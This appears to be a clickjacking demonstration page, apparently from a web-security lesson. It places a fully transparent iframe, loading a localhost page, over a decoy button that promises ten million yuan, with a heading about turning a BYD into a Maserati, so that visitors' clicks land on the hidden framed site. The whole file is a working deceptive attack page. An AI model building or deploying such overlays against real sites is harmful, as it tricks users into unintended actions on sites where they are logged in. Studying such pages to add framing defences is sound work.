<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        iframe {
            width: 800px;
            height: 300px;
            position: absolute;
            top: -0px;
            left: -0px;
            z-index: 2;
            -moz-opacity: 0;
            opacity: 0;
            filter: alpha(opacity=0);
        }

        button {
            position: absolute;
            top: 181px;
            left: 253px;
            z-index: 1;
        }
    </style>
</head>

<body>
    <h1>恭喜进入“试一试，比亚迪变玛莎拉蒂”网站</h1>
    <button>点击领取一千万元</button>
    <iframe src="http://localhost:4000/home" scrolling="no"></iframe>
</body>

</html>
